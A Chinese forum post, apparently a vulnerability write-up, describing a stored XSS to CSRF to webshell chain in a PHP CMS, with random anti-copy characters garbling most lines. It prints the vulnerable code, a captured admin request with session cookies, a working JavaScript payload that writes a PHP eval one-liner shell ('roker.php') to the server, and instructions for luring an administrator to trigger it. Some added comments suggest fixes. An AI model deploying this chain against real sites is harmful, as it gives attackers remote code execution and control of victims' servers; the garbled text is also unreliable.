这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下载了源码。
因为后台登录还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
4 _% d* C' j1 i) g3 t; D本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( O' @9 x. g5 W7 S7 r4 i% |/ s
9 R" K; O) u% b8 p5 q% m& J* [
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>" v0 G, T8 d/ l! J* N
3 w) e! ^1 D- |* g3 N3 J</textarea></td></tr>; {% Z& N1 `8 Y. k8 L- B( o2 _8 {
. z+ I& Y; o; m( Z4 `! C
user/do.php
& c+ w0 H: @, x( ?9 i1 e0 s1 C& I$ v: G- {+ {; z
. A8 G% s2 X0 ?9 S7 Q
if($op=='zl'){ //资料
. X1 Y" v5 h3 X2 C # H O5 q$ g+ b& M8 C4 e/ |8 C6 ]0 E! O
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
) O2 Y9 ? w1 Z6 K+ G; }( S exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
- c3 r) e% ~, _# D4 K+ O , V. h5 t. `4 I
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
2 F7 B, T0 h' r$ U
5 T. x0 G- y( @5 D v CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
4 q# W" k l4 g' ^7 `9 A5 v where CS_Name='".$cscms_name."'";0 x7 b5 ^# \- y) z
, |9 m* Q! H" V* d7 h
if($db->query($sql)){: ~% w' f0 c+ E$ ]9 C
, G% N% p& m3 x- _& C. a
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 K1 m' D+ m" W* H5 r" G
) v" D7 {2 c( q* z+ T" O
}else{
' V: j5 G1 A- M0 I' [
' h; F2 \+ J* i' a exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));# X) p S- W1 f' m: k) O
4 M$ O) K' {( L
}/ v- e, O5 X" E5 ?; T
5 [5 Q t$ h* _6 ]5 s9 \) Q
没有过滤，导致 XSS 产生。
后台看了下，很奇葩的是可以写任意格式文件。
抓包：
$ x8 }# O4 I- B5 E/ E5 B' K) }3 Y) O- @0 B# d* m* |
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.18 ]3 y5 @: \' D
8 M7 N- |4 A' N$ sAccept: text/html, application/xhtml+xml, */*
5 ~: r2 ^- R ^ + e" A% H8 ]7 @, N8 H7 _# x; f1 e% n
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* j) @8 Z( n/ K4 X& H# v$ R+ J
4 ?; o: ?) y( `
Accept-Language: zh-CN4 }* U) z1 G1 B9 _
/ P6 R ]1 l/ G- J& `7 l e
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0 i! u- E/ x! d% O* w- z
9 z. ^, f' P- p- Y" m4 u& Q, u) r; mContent-Type: application/x-www-form-urlencoded
# Y* C* ]3 P( k9 \ / H5 g/ ~. a' G5 r# a* }, o
Accept-Encoding: gzip, deflate
, U: ~ s' k: r0 T, x0 t & B8 m5 @( p5 J# c
Host: 127.0.0.1 L3 {; g! C' ^2 D# w8 @" u
$ W+ U3 v! H5 h; w( EContent-Length: 38
" G5 ~( K/ {+ Q; Y9 R% B; K
/ b6 X4 V# N6 j; {DNT: 1: Q- \) C) _% [2 I1 {
9 U. R4 f& F- n* {2 c/ R
Connection: Keep-Alive9 q" y# _% ^5 a# x+ M6 M) G' @
, h, j8 Q# ~$ b# ]Cache-Control: no-cache
6 n6 R$ P* W% ~ ( i% |% h2 P r3 H
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
% f- A0 d: _8 Y- l. b% d
4 T! [; |! Y" R6 S1 a, e* K2 p/ ?2 Q4 E* N$ W5 `0 t9 g5 P5 N
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
- q* I6 S- y' X5 m; }% S" B8 P; ?& h- N+ G1 ?9 v$ }+ f0 I8 ~# a% ^
3 P/ {; T8 d0 ]
* v/ M! g8 _: ]. [. P* F
于是构造 JS 如下。
2 Q" t8 f- F5 G% v+ q# D! C8 Q( N
本帖隐藏的内容<script>
U# }) U6 h* r# pthisTHost = top.location.hostname;
9 |- ?3 L7 {: v, L6 p; @5 M/ A9 A
, _" K- Y# ]; I& HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";( p `, D9 Q6 J$ m
4 n0 I9 w* U/ Q8 H
// Builds a hidden <form> with two fields, "name" and "content", and auto-submits it
// as a POST to `url` from the victim's browser. Because the request rides on the
// admin's existing cookies, this is the CSRF primitive of the chain: the stored XSS
// in the signature field only has to get this script rendered once by an admin.
// Defensive takeaways for the CMS: (1) HTML-encode CS_Qianm on output and on save,
// (2) require a per-session CSRF token on admin/skins/skins.php writes, and
// (3) reject template names whose extension is not a template type before writing.
// NOTE(review): the lines below are reproduced as extracted; the interleaved
// character noise is forum anti-copy garbling, not part of the script.
function PostSubmit(url, data, msg) { 9 t! O# V* @; m. x0 @
var postUrl = url;
; b$ F1 x4 S3 p$ S' h. l ( ], P/ L0 U( O' O6 {
var postData = data; 5 O; u# W; Y: q+ h9 J% h
var msgData = msg; 7 [* e5 Z4 M9 N7 }
var ExportForm = document.createElement("FORM");
1 V9 ^) F* ?6 ]2 a3 W% i document.body.appendChild(ExportForm); `) L$ c, {: t+ J1 u+ c) s! [
ExportForm.method = "POST";
; k" S+ V9 ~- A8 {/ p- _. i! \, l var newElement = document.createElement("input"); ' }& Y5 x& Z5 Y2 r! t
// Field "name" receives the `data` argument (the target file name).
newElement.setAttribute("name", "name"); # a) _0 G1 g6 y) J" B$ b2 _
newElement.setAttribute("type", "hidden");
% t+ Z- l2 {7 P$ } var newElement2 = document.createElement("input");
// Field "content" receives the `msg` argument (the file body).
) s+ [. B( z& _& o. {0 x2 ]' g newElement2.setAttribute("name", "content");
5 f" S+ q: G7 G) N7 T' T newElement2.setAttribute("type", "hidden"); . j4 S$ ^5 ]' h8 s+ ], Y
ExportForm.appendChild(newElement); . ~4 t9 @( z/ g3 C
ExportForm.appendChild(newElement2); , t0 i, |* O/ d
newElement.value = postData;
- H4 _; S$ n0 u newElement2.value = msgData;
w% T+ w3 ]. j" ~$ D% e( Y ExportForm.action = postUrl; 5 q$ ]! A/ I( e; o* p+ z) {, Z) W( _
// Submission happens without any user interaction; a CSRF token check server-side
// is what would make this forged POST fail.
ExportForm.submit(); 5 e0 [, h' l0 ]( d: S! @; {, P
};- S$ K( r6 Z, z- f# @4 W1 _
+ t8 f3 Y& m w! N
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");7 x8 U9 `8 h. j
- K% c& e3 L |( M, m7 p4 s
</script>& O9 k& u6 z0 B( ^5 J4 ^# F/ k( {
; ]0 W6 Z' d. }4 n6 s% [) R
! w, x, t, n# t) F& f. q$ s
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。